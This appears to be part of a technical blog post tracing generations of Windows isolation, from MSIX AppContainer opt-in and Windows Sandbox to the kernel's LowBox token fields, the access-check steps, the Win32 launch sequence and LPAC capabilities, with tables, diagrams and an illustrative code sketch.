&lt;p&gt;The Windows 10 October 2018 Update [@wiki-win10-versions] shipped MSIX with an explicit manifest opt-in for AppContainer. The MSIX schema page documents the two values &lt;code&gt;uap10:TrustLevel&lt;/code&gt; may take: &quot;mediumIL&quot; and &quot;appContainer&quot; [@ms-learn-manifest-app]. There are exactly two trust levels, not three. The widely-stated &quot;third trust level&quot; of &lt;code&gt;runFullTrust&lt;/code&gt; is in fact a &lt;em&gt;restricted capability&lt;/em&gt; that a &lt;code&gt;mediumIL&lt;/code&gt; package may declare under its &lt;code&gt;&amp;lt;Capabilities&amp;gt;&lt;/code&gt; element to register out-of-process COM and similar legacy-Win32 mechanisms [@ms-learn-capabilities]. Microsoft Learn&apos;s MSIX container migration page walks the conversion explicitly, showing the manifest going from &lt;code&gt;&amp;lt;rescap:Capability Name=&quot;runFullTrust&quot; /&amp;gt;&lt;/code&gt; to &lt;code&gt;uap10:TrustLevel=&quot;appContainer&quot;&lt;/code&gt; [@ms-learn-msix-container]. The Wikipedia article on App Installer (which MSIX redirects to) records the App Installer tool&apos;s introduction in the Windows 10 1607 Anniversary Update; the MSIX format itself debuted with Windows 10 1809 in 2018 [@wiki-msix].&lt;/p&gt;
&lt;p&gt;For developers, the win is that the MSIX deployment stack does all the LowBox plumbing on the application&apos;s behalf at install. The application binary itself does not change; the manifest changes, and the App Installer pipeline derives the package SID, creates the profile, and registers the per-package directories.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Bridge: still a user-mode boundary; many packaged apps stay at &lt;code&gt;mediumIL&lt;/code&gt; plus &lt;code&gt;runFullTrust&lt;/code&gt;.&lt;/em&gt;&lt;/p&gt;
&lt;h3&gt;4.7 Generation 6: Windows Sandbox = AppContainer + Hyper-V (Windows 10 1903, May 21, 2019)&lt;/h3&gt;
&lt;p&gt;Microsoft announced Windows Sandbox on the Tech Community blog as &quot;a new lightweight desktop environment tailored for safely running applications in isolation&quot; [@windows-sandbox-announce]. It shipped in the Windows 10 May 2019 Update [@win10-1903-ga] [@wiki-win10-versions]. Three architectural primitives carry the design.&lt;/p&gt;
&lt;p&gt;The first is the Dynamic Base Image, the pristine read-only file set the sandbox&apos;s guest kernel boots from. Microsoft Learn describes its character: &quot;Most OS files are immutable and can be freely shared with Windows Sandbox. A small subset of operating system files are mutable and can&apos;t be shared, so the sandbox base image contains pristine copies of them&quot; [@ms-learn-sandbox-arch]. Footprint figures from the same page: &quot;Before Windows Sandbox is installed, the dynamic base image package is stored as a compressed 30-MB package. Once installed, the dynamic base image occupies about 500 MB of disk space&quot; [@ms-learn-sandbox-arch].&lt;/p&gt;
&lt;p&gt;The second is direct-map memory sharing. &quot;when &lt;code&gt;ntdll.dll&lt;/code&gt; is loaded into memory in the sandbox, it uses the same physical pages as those pages of the binary when loaded on the host&quot; [@ms-learn-sandbox-arch]. Read-only host code does not get re-paged into guest memory; the guest&apos;s virtual address space simply maps to the same physical frames.&lt;/p&gt;
&lt;p&gt;The third is the host-side AppContainer wrap. The host-side container manager has been reported in security-research write-ups to itself run in a LowBox token, though Microsoft&apos;s published Windows Sandbox architecture documentation describes only the Hyper-V partition boundary. The actual containment boundary is the &lt;a href=&quot;https://paragmali.com/blog/above-ring-zero-how-the-windows-hypervisor-became-a-security/&quot; rel=&quot;noopener&quot;&gt;Hyper-V partition&lt;/a&gt;: Microsoft Learn&apos;s overview is explicit. The sandbox &quot;relies on the Microsoft hypervisor to run a separate kernel that isolates Windows Sandbox from the host&quot; [@ms-learn-sandbox-overview]. A kernel exploit inside the sandbox kernel does &lt;em&gt;not&lt;/em&gt; reach the host kernel, because the host kernel is on the other side of the Type-1 hypervisor partition.The 30 MB compressed / 500 MB installed Dynamic Base Image figures come from the Microsoft Learn architecture page [@ms-learn-sandbox-arch]; the &quot;few seconds to launch&quot; wall-clock figure and the &quot;data persists through restarts initiated within the sandbox&quot; Windows 11 22H2 persistence behaviour are from the overview page [@ms-learn-sandbox-overview]. The persistence behaviour explicitly excludes Windows Home edition.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Bridge: WDAG (the per-tab Edge variant of Hyper-V isolation) was retired in Windows 11 24H2. Per-app Hyper-V isolation is no longer the Microsoft direction. Microsoft Defender Application Guard&apos;s overview page documents the retirement: &quot;Microsoft Defender Application Guard, including the Windows Isolated App Launcher APIs, is deprecated for Microsoft Edge for Business and will no longer be updated&quot;; &quot;Starting with Windows 11, version 24H2, Microsoft Defender Application Guard, including the Windows Isolated App Launcher APIs, is no longer available&quot; [@ms-learn-mdag].&lt;/em&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Gen&lt;/th&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Key idea&lt;/th&gt;
&lt;th&gt;What it added&lt;/th&gt;
&lt;th&gt;Failure that motivated the next&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;1993&lt;/td&gt;
&lt;td&gt;Identity equals authority&lt;/td&gt;
&lt;td&gt;Classic NT access token&lt;/td&gt;
&lt;td&gt;Cannot distinguish two apps as same user&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;2007&lt;/td&gt;
&lt;td&gt;Add a mandatory label&lt;/td&gt;
&lt;td&gt;Integrity levels, broker pattern&lt;/td&gt;
&lt;td&gt;NO_READ_UP missing; shared identity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;2008&lt;/td&gt;
&lt;td&gt;Sandbox in user mode&lt;/td&gt;
&lt;td&gt;Broker / target, restricted token&lt;/td&gt;
&lt;td&gt;No per-app principal in the kernel&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;2012&lt;/td&gt;
&lt;td&gt;Per-app SID alphabets&lt;/td&gt;
&lt;td&gt;LowBox flag, package and capability SIDs&lt;/td&gt;
&lt;td&gt;ALL_APP_PACKAGES is broad; Win32 cannot opt in&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;2016&lt;/td&gt;
&lt;td&gt;Deny-by-default&lt;/td&gt;
&lt;td&gt;WIN://NOALLAPPPKG strips ALL_APP_PACKAGES&lt;/td&gt;
&lt;td&gt;Still user-mode; not auto-applied to Win32&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;2018&lt;/td&gt;
&lt;td&gt;Manifest opt-in for Win32&lt;/td&gt;
&lt;td&gt;MSIX TrustLevel=&quot;appContainer&quot;&lt;/td&gt;
&lt;td&gt;Still user-mode; kernel exploit bypasses&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;2019&lt;/td&gt;
&lt;td&gt;Hyper-V isolation wrap&lt;/td&gt;
&lt;td&gt;Dynamic Base Image + direct-map&lt;/td&gt;
&lt;td&gt;Per-app HV not the direction (WDAG retired)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;By 2026 a single Edge browser instance runs the host UI at Medium IL (Gen 0), uses MIC labels (Gen 1), runs a broker / target architecture (Gen 2), launches renderers as LowBox tokens (Gen 3) with &lt;code&gt;WIN://NOALLAPPPKG&lt;/code&gt; (Gen 4), is itself an MSIX-packaged app (Gen 5), and can be invoked inside Windows Sandbox (Gen 6). The chain is &lt;em&gt;layered&lt;/em&gt;, not &lt;em&gt;successive&lt;/em&gt;. The next section opens the LowBox token in WinDbg and walks the five token-level fields that produce these behaviours.&lt;/p&gt;
&lt;h2&gt;5. The Five Token-Level Fields&lt;/h2&gt;
&lt;p&gt;If you load WinDbg on a Windows 11 25H2 kernel debugging session and inspect the access token of a UWP &lt;code&gt;calc.exe&lt;/code&gt; process with &lt;code&gt;!token&lt;/code&gt;, then do the same for a plain &lt;code&gt;notepad.exe&lt;/code&gt;, the differences cluster in five fields. Four of them are pointer-valued; one of them is a single bit. Three of them are public in Microsoft&apos;s &lt;code&gt;winnt.h&lt;/code&gt;-adjacent surface. Two are internal field names that Alex Ionescu reverse-engineered in his Black Hat USA 2015 talk &lt;em&gt;Battle of SKM and IUM: How Windows 10 Rewrites OS Architecture&lt;/em&gt; [@ionescu-bh15], and that James Forshaw walks systematically in his 2024 No Starch Press book &lt;em&gt;Windows Security Internals&lt;/em&gt; [@nostarch-wsi].&lt;/p&gt;
&lt;h3&gt;5.1 &lt;code&gt;_TOKEN.Flags.LowBoxToken&lt;/code&gt; -- the bit&lt;/h3&gt;
&lt;p&gt;The bit. The kernel&apos;s &lt;code&gt;_TOKEN.Flags&lt;/code&gt; word carries a &lt;code&gt;LowBoxToken&lt;/code&gt; bit that &lt;code&gt;NtCreateLowBoxToken&lt;/code&gt; sets and that no later operation modifies [@nostarch-wsi]. Every kernel access-check path consults this bit when deciding which evaluation rules to apply. If the bit is clear, the token is a classic NT user token and &lt;code&gt;SeAccessCheck&lt;/code&gt; proceeds in the 1993 way. If the bit is set, the kernel adds the package-SID claim check, the capability-claim check, and the namespace redirect that we will walk in §5.2 through §5.5.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The bit in &lt;code&gt;_TOKEN.Flags.LowBoxToken&lt;/code&gt; is what tells the kernel to evaluate the per-app principal alongside the per-user principal. Everything else in the LowBox token is bookkeeping for that decision.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The other four fields are the bookkeeping.&lt;/p&gt;
&lt;h3&gt;5.2 &lt;code&gt;_TOKEN.PackageSid&lt;/code&gt; -- the package principal&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;PackageSid&lt;/code&gt; is a &lt;code&gt;PSID&lt;/code&gt; field in the kernel token structure that carries the &lt;code&gt;S-1-15-2-*&lt;/code&gt; SID for the package. The Microsoft surface calls it the AppContainer SID. It is the per-application principal the kernel&apos;s access-check path checks DACL entries against. When you mount a per-package ACL like the one in &lt;code&gt;%LOCALAPPDATA%\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\&lt;/code&gt; and find an access control entry naming &lt;code&gt;S-1-15-2-466767348-3739614953-2700836392-...&lt;/code&gt;, that ACE is allowing or denying exactly the LowBox process whose &lt;code&gt;PackageSid&lt;/code&gt; matches.&lt;/p&gt;

A `PSID` value with the prefix `S-1-15-2-` derived deterministically by SHA-2 hash from the package&apos;s family name and used as the *per-application principal* in DACL evaluations against AppContainer processes [@ms-learn-derivesid]. The same package family name produces the same Package SID on every Windows 8 or later machine, which is why per-package directories on disk can be ACL&apos;d to a known SID at install time. The 32-bit sub-authorities are sequential 4-byte slices of the underlying hash.
&lt;p&gt;The signature of &lt;code&gt;DeriveAppContainerSidFromAppContainerName&lt;/code&gt; confirms the &lt;em&gt;derivation&lt;/em&gt; is intended to be deterministic and reproducible [@ms-learn-derivesid]: &quot;Gets the SID of the specified profile&quot;, with a Windows 8 minimum supported client. The reverse direction -- start from a Package SID and recover the moniker -- is not feasible without the inverse hash, which is by construction infeasible.&lt;/p&gt;
&lt;h3&gt;5.3 &lt;code&gt;_TOKEN.Capabilities[]&lt;/code&gt; -- the per-capability claim array&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;Capabilities[]&lt;/code&gt; is a kernel array of &lt;code&gt;SID_AND_ATTRIBUTES&lt;/code&gt; structures, populated by &lt;code&gt;NtCreateLowBoxToken&lt;/code&gt; from the &lt;code&gt;Capabilities&lt;/code&gt; parameter the caller passes [@ms-learn-ntcreatelowboxtoken]. Each capability SID lives in the &lt;code&gt;S-1-15-3-*&lt;/code&gt; alphabet [@ms-learn-well-known-sids] and represents a specific permission the package declared in its manifest [@ms-learn-capabilities]. Each capability is &lt;em&gt;checked&lt;/em&gt; by the relevant resource manager: the Windows Filtering Platform checks the &lt;code&gt;internetClient&lt;/code&gt; capability SID for outbound network packets, the Object Manager checks namespace capabilities for the per-package directories, the contacts WinRT broker checks the &lt;code&gt;contactsLibrary&lt;/code&gt; capability SID against the contacts ACL.&lt;/p&gt;

A `PSID` value with the prefix `S-1-15-3-` representing a per-package permission [@ms-learn-well-known-sids]. Capability SIDs are stamped into a LowBox token&apos;s `Capabilities[]` array at process creation and consulted by the kernel callout, broker, or kernel access-check path that gates the corresponding resource [@ms-learn-implementing]. The capability vocabulary is open-ended: standard Microsoft-defined capabilities such as `internetClient` coexist with developer-defined custom capabilities and Chromium&apos;s `Lpac*` synthetic constants.
&lt;p&gt;Microsoft Learn&apos;s AppContainer-implementation page formalises the dual-principal access rule for these fields with the same intersection wording quoted in §4.4: the granted access is the intersection of what the user / group SIDs allow and what the AppContainer SIDs allow [@ms-learn-implementing]. The capability-claim check fails closed: a capability the manifest did not declare is not in &lt;code&gt;Capabilities[]&lt;/code&gt;, the kernel callout does not find a matching claim, and the access fails.&lt;/p&gt;
&lt;p&gt;Selected capability SIDs and the resources they gate look like this.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Capability&lt;/th&gt;
&lt;th&gt;What it gates&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;internetClient&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Outbound TCP/UDP via WFP callout&lt;/td&gt;
&lt;td&gt;[@ms-learn-capabilities]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;internetClientServer&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Inbound + outbound network&lt;/td&gt;
&lt;td&gt;[@ms-learn-capabilities]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;picturesLibrary&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Read access to user&apos;s Pictures library&lt;/td&gt;
&lt;td&gt;[@ms-learn-capabilities]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;documentsLibrary&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Restricted; access to user Documents&lt;/td&gt;
&lt;td&gt;[@ms-learn-capabilities]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;enterpriseAuthentication&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Restricted; Kerberos authentication&lt;/td&gt;
&lt;td&gt;[@ms-learn-capabilities]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;microphone&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Audio input device&lt;/td&gt;
&lt;td&gt;[@ms-learn-capabilities]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;webcam&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Video input device&lt;/td&gt;
&lt;td&gt;[@ms-learn-capabilities]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;location&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Geolocation API&lt;/td&gt;
&lt;td&gt;[@ms-learn-capabilities]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;runFullTrust&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Restricted; opt-out of AppContainer for mediumIL packages&lt;/td&gt;
&lt;td&gt;[@ms-learn-capabilities]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;WIN://NOALLAPPPKG&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Strip ALL_APP_PACKAGES from token (LPAC)&lt;/td&gt;
&lt;td&gt;[@ms-learn-implementing] [@chromium-lpac]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;lpacCom&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;LPAC needs this to use COM&lt;/td&gt;
&lt;td&gt;[@ms-learn-implementing]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;registryRead&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;LPAC needs this to open registry keys&lt;/td&gt;
&lt;td&gt;[@ms-learn-implementing]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Several rows here have a &lt;em&gt;restricted capability&lt;/em&gt; designation in the manifest schema; Microsoft Learn&apos;s note on &lt;code&gt;runFullTrust&lt;/code&gt; is that &quot;a Medium IL app &lt;em&gt;needs&lt;/em&gt; to declare the &lt;strong&gt;runFullTrust&lt;/strong&gt; restricted capability&quot; before it can register out-of-process COM [@ms-learn-capabilities]. The same page gives the structural advice every developer should treat as default: &quot;be sure to declare only the capabilities that your app needs&quot; [@ms-learn-capabilities].&lt;/p&gt;
&lt;h3&gt;5.4 &lt;code&gt;_TOKEN.LowboxNumberEntry&lt;/code&gt; -- the per-instance number&lt;/h3&gt;
&lt;p&gt;Two simultaneous Microsoft Calculator processes both carry the same Package SID and the same Capabilities array. What makes them distinct principals to the kernel is the &lt;code&gt;AppContainerNumber&lt;/code&gt; -- a per-instance integer assigned by &lt;code&gt;NtCreateLowBoxToken&lt;/code&gt; at token-creation time. The kernel maintains a session-scoped AVL tree keyed by this number. Ionescu named the corresponding kernel data structure in his 2015 reverse engineering [@ionescu-bh15]; the public-facing reference is Forshaw&apos;s 2024 book [@nostarch-wsi].&lt;/p&gt;

A per-instance integer assigned by `NtCreateLowBoxToken` to each LowBox token at creation time and used as the key into the kernel&apos;s session-scoped AVL trees that hold the per-instance named-object handles and the per-instance namespace state [@nostarch-wsi]. Two simultaneously running processes of the same package have the *same* Package SID but *different* `AppContainerNumber` values. This is the field that makes two co-tenanted calculator processes opaque to each other.
&lt;p&gt;The internal field names &lt;code&gt;_TOKEN.Flags.LowBoxToken&lt;/code&gt;, the AVL tree at &lt;code&gt;nt!SepLowBoxNumberTable&lt;/code&gt;, and the &lt;code&gt;AppContainerNumber&lt;/code&gt; are not in any official Microsoft document. The canonical primary sources for them are Ionescu&apos;s Black Hat 2015 reverse engineering [@ionescu-bh15] and Forshaw&apos;s 2024 book &lt;em&gt;Windows Security Internals&lt;/em&gt; [@nostarch-wsi]. Microsoft&apos;s own &lt;code&gt;NtCreateLowBoxToken&lt;/code&gt; page documents the &lt;em&gt;behaviour&lt;/em&gt; but does not name the internal fields [@ms-learn-ntcreatelowboxtoken].&lt;/p&gt;
&lt;h3&gt;5.5 &lt;code&gt;_TOKEN.LowboxHandlesEntry&lt;/code&gt; -- the saved namespace handles&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;LowboxHandlesEntry&lt;/code&gt; points into a &lt;em&gt;second&lt;/em&gt; AVL tree, keyed by the same &lt;code&gt;AppContainerNumber&lt;/code&gt;. The entry carries kernel handles to the per-package directory at &lt;code&gt;\Sessions\&amp;lt;n&amp;gt;\AppContainerNamedObjects\&amp;lt;package-sid&amp;gt;\&lt;/code&gt; and to its &lt;code&gt;RPC Control&lt;/code&gt; sub-directory. The handles are captured by &lt;code&gt;NtCreateLowBoxToken&lt;/code&gt; (the syscall&apos;s last two parameters are &lt;code&gt;HandleCount&lt;/code&gt; and &lt;code&gt;Handles[]&lt;/code&gt; [@ms-learn-ntcreatelowboxtoken]) and stored in the AVL tree for later lookups.&lt;/p&gt;
&lt;p&gt;When a LowBox process calls &lt;code&gt;NtCreateMutant(&quot;\\Global\\Foo&quot;)&lt;/code&gt;, the Object Manager&apos;s path-walker (&lt;code&gt;ObpLookupObjectName&lt;/code&gt;) consults &lt;code&gt;LowboxHandlesEntry&lt;/code&gt; to substitute the rewrite. The lookup proceeds against the per-package directory rather than the global &lt;code&gt;\BaseNamedObjects&lt;/code&gt;. The application&apos;s request for &quot;Global\Foo&quot; silently resolves to &quot;\Sessions\1\AppContainerNamedObjects\S-1-15-2-...\Foo&quot; -- which is invisible to any other package, because every other package has a different per-instance handle pointing to a different directory.&lt;/p&gt;
&lt;p&gt;This is the mechanism Forshaw&apos;s Project Zero Issue 1550 attacked in 2018. Forshaw&apos;s writeup names the surface: &quot;this API creates object directories under the user&apos;s AppContainerNamedObjects object directory to support redirecting BaseNamedObjects and RPC endpoints by the OS&quot; [@p0-1550]. The implementation bug was in the &lt;em&gt;helper&lt;/em&gt; (the AppInfo service&apos;s &lt;code&gt;CreateAppContainerToken&lt;/code&gt;); the primitive itself is structurally sound.&lt;/p&gt;
&lt;h3&gt;The five-step LowBox access check&lt;/h3&gt;
&lt;p&gt;Putting the five fields together, every access decision from a LowBox process runs through this five-step sequence.&lt;/p&gt;

flowchart TD
    A[Access requested by LowBox process] --&amp;gt; B[&quot;Step 1: Classic DACL walk&lt;br /&gt;SeAccessCheck against user + groups&quot;]
    B --&amp;gt; C[&quot;Step 2: MIC label check&lt;br /&gt;NO_WRITE_UP (default)&lt;br /&gt;against IL=Low&quot;]
    C --&amp;gt; D[&quot;Step 3: Package SID claim&lt;br /&gt;does object&apos;s DACL name PackageSid?&quot;]
    D --&amp;gt; E[&quot;Step 4: Capability claim&lt;br /&gt;WFP / broker / kernel callout&lt;br /&gt;checks Capabilities array&quot;]
    E --&amp;gt; F[&quot;Step 5: Namespace redirect&lt;br /&gt;ObpLookupObjectName rewrites&lt;br /&gt;BaseNamedObjects path&quot;]
    F --&amp;gt; G[Allow]
    F --&amp;gt; H[Deny]
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Classic DACL check.&lt;/strong&gt; &lt;code&gt;SeAccessCheck&lt;/code&gt; walks the object&apos;s DACL exactly as if the caller were a normal user. The user SID and group SIDs in the token contribute to the granted-access mask.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;MIC label check.&lt;/strong&gt; The SACL&apos;s mandatory-integrity ACE is compared against the token&apos;s &lt;code&gt;IntegrityLevel&lt;/code&gt;. AppContainer tokens are &lt;em&gt;always&lt;/em&gt; Low [@ms-learn-legacy]; if the object&apos;s mandatory ACE says &lt;code&gt;NO_WRITE_UP&lt;/code&gt; and the request is a write, the access is denied here. The default &lt;code&gt;NO_WRITE_UP&lt;/code&gt;-only policy from Vista [@ms-learn-mic] means a Low-IL LowBox process still cannot write to a default-ACL Medium object.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Package SID claim check.&lt;/strong&gt; The object&apos;s DACL may grant access specifically to the Package SID. If matched, the package SID claim contributes to the granted mask. This is the channel by which per-package data directories are made accessible to the package and only the package.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Capability claim check.&lt;/strong&gt; A WFP callout, a broker, or a kernel callout checks whether the requested resource maps onto a declared capability. The Windows Filtering Platform compares the outbound socket&apos;s destination against the firewall callout&apos;s allow list; if the package did not declare &lt;code&gt;internetClient&lt;/code&gt;, no &lt;code&gt;S-1-15-3-*&lt;/code&gt; capability matches and the connection fails.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Named-object namespace redirect.&lt;/strong&gt; References to objects under &lt;code&gt;\BaseNamedObjects&lt;/code&gt; (mutants, events, sections, RPC endpoints) are rewritten by the Object Manager to &lt;code&gt;\Sessions\&amp;lt;n&amp;gt;\AppContainerNamedObjects\&amp;lt;package-sid&amp;gt;\&lt;/code&gt; before lookup. This is what makes &quot;Global\Foo&quot; mean a per-package object for the LowBox process.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Microsoft Learn&apos;s intersection rule is the canonical articulation: &quot;the permitted access is the intersection of that granted by the user/group SIDs and AppContainer SIDs&quot; [@ms-learn-implementing]. A user / group ACE that grants &lt;code&gt;FILE_READ_DATA&lt;/code&gt; and a package SID ACE that grants &lt;code&gt;FILE_READ_DATA | FILE_WRITE_DATA&lt;/code&gt; together produce &lt;code&gt;FILE_READ_DATA&lt;/code&gt;, because the intersection is the smaller set.&lt;/p&gt;

flowchart LR
    T[&quot;_TOKEN structure&quot;] --&amp;gt; U[&quot;User&lt;br /&gt;S-1-5-21-...&quot;]
    T --&amp;gt; G[&quot;Groups[]&quot;]
    T --&amp;gt; P[&quot;Privileges[]&quot;]
    T --&amp;gt; I[&quot;IntegrityLevel&lt;br /&gt;(always Low for LowBox)&quot;]
    T --&amp;gt; F[&quot;Flags&lt;br /&gt;(LowBoxToken bit)&quot;]
    T --&amp;gt; PK[&quot;PackageSid&lt;br /&gt;S-1-15-2-...&quot;]
    T --&amp;gt; CA[&quot;Capabilities[]&lt;br /&gt;SID_AND_ATTRIBUTES&quot;]
    T --&amp;gt; LN[&quot;LowboxNumberEntry&quot;]
    T --&amp;gt; LH[&quot;LowboxHandlesEntry&quot;]
    LN -.-&amp;gt;|&quot;keyed lookup&quot;| AVL1[&quot;nt!SepLowBoxNumberTable&lt;br /&gt;AVL tree by AppContainerNumber&quot;]
    LH -.-&amp;gt;|&quot;keyed lookup&quot;| AVL2[&quot;nt!SepLowBoxHandlesTable&lt;br /&gt;AVL tree of saved directory handles&quot;]
&lt;h3&gt;The Win32 launch surface&lt;/h3&gt;
&lt;p&gt;The minimum production launch sequence has four moving parts. &lt;code&gt;CreateAppContainerProfile&lt;/code&gt; derives the Package SID, lays down the per-package profile on disk, and returns the SID and the profile root [@ms-learn-createprofile]. &lt;code&gt;InitializeProcThreadAttributeList&lt;/code&gt; allocates a process-attribute list. &lt;code&gt;UpdateProcThreadAttribute&lt;/code&gt; installs the &lt;code&gt;PROC_THREAD_ATTRIBUTE_SECURITY_CAPABILITIES&lt;/code&gt; attribute, whose payload is a &lt;code&gt;SECURITY_CAPABILITIES&lt;/code&gt; struct carrying the AppContainer SID, the capability array, and a count [@ms-learn-updateprocthread] [@ms-learn-security-capabilities]. &lt;code&gt;CreateProcess&lt;/code&gt; (or &lt;code&gt;CreateProcessAsUser&lt;/code&gt;) with &lt;code&gt;STARTUPINFOEX&lt;/code&gt; carrying the attribute list launches the new process. Inside the kernel, &lt;code&gt;NtCreateLowBoxToken&lt;/code&gt; does the work [@ms-learn-ntcreatelowboxtoken]: it sets &lt;code&gt;_TOKEN.Flags.LowBoxToken&lt;/code&gt;, stamps &lt;code&gt;PackageSid&lt;/code&gt;, populates &lt;code&gt;Capabilities[]&lt;/code&gt;, assigns the &lt;code&gt;AppContainerNumber&lt;/code&gt;, and saves the directory handles into &lt;code&gt;LowboxHandlesEntry&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;{`
// This sketches the &lt;em&gt;shape&lt;/em&gt; of the Win32 launch surface, not real P/Invoke.
// Real callers go through Win32 from C/C++/Rust or via interop.&lt;/p&gt;
&lt;p&gt;type PSID = string; // S-1-15-2-... package SIDs
type SECURITY_CAPABILITIES = {
  AppContainerSid: PSID;
  Capabilities: { Sid: PSID; Attributes: number }[];
};&lt;/p&gt;
&lt;p&gt;function createSandboxedProcess(packageName: string, exe: string) {
  // Step 1: derive Package SID, create per-package profile on disk.
  const packageSid = createAppContainerProfile(packageName, {
    displayName: packageName,
    description: &quot;Sandboxed worker&quot;,
    capabilities: [&quot;internetClient&quot;],
  });&lt;/p&gt;
&lt;p&gt;  // Step 2: build the capabilities payload.
  const caps: SECURITY_CAPABILITIES = {
    AppContainerSid: packageSid,
    Capabilities: [
      { Sid: &quot;S-1-15-3-1&quot;, Attributes: 0 }, // internetClient capability SID
    ],
  };&lt;/p&gt;
&lt;p&gt;  // Step 3: install PROC_THREAD_ATTRIBUTE_SECURITY_CAPABILITIES.
  const attrList = initializeProcThreadAttributeList(1);
  updateProcThreadAttribute(
    attrList,
    &quot;PROC_THREAD_ATTRIBUTE_SECURITY_CAPABILITIES&quot;,
    caps,
  );&lt;/p&gt;
&lt;p&gt;  // Step 4: launch. Kernel calls NtCreateLowBoxToken under the hood.
  return createProcess(exe, { startupInfoEx: { attributeList: attrList } });
}&lt;/p&gt;
&lt;p&gt;// Demonstration only:
const info = createSandboxedProcess(&quot;contoso.WidgetApp_8wekyb3d8bbwe&quot;, &quot;widget.exe&quot;);
console.log(&quot;Launched LowBox PID&quot;, info.pid);
console.log(&quot;Package SID:&quot;, info.packageSid);
console.log(&quot;Capabilities granted:&quot;, info.caps);
`}&lt;/p&gt;
&lt;h3&gt;LPAC: one synthetic capability&lt;/h3&gt;
&lt;p&gt;A LowBox token whose &lt;code&gt;Capabilities[]&lt;/code&gt; includes the synthetic &lt;code&gt;WIN://NOALLAPPPKG&lt;/code&gt; capability causes the kernel to &lt;em&gt;omit&lt;/em&gt; the &lt;code&gt;ALL_APP_PACKAGES&lt;/code&gt; group SID from the new token entirely. The token&apos;s groups become strictly the package&apos;s own derivations, plus the declared capabilities, plus the universal SIDs. Microsoft Learn&apos;s wording: &quot;Less Privileged AppContainers (LPAC) are even more isolated than regular AppContainers and require further capabilities to gain access to resources that regular AppContainers already have access to such as the registry, files, and others. For example, LPAC cannot open any keys in the registry unless it has the &lt;em&gt;registryRead&lt;/em&gt; capability and cannot use COM unless it has the &lt;em&gt;lpacCom&lt;/em&gt; capability&quot; [@ms-learn-implementing]. The Chromium source&apos;s &lt;code&gt;lpac_capability.h&lt;/code&gt; enumerates the full set Microsoft Edge inherits at renderer launch [@chromium-lpac]. Section 6.3 walks the practical consequences.&lt;/p&gt;
